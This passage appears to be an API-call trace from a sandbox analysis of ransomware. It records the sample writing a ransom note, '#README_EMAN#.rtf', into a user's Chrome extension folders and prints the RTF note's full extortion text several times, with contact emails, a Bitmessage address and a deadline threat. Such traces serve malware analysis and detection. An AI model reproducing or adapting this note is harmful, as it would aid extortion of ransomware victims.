th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.179] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.180] CloseHandle (hObject=0x2e8) returned 1 [0292.180] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\#readme_eman#.rtf")) returned 0xffffffff [0292.180] GetLastError () returned 0x2 [0292.180] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 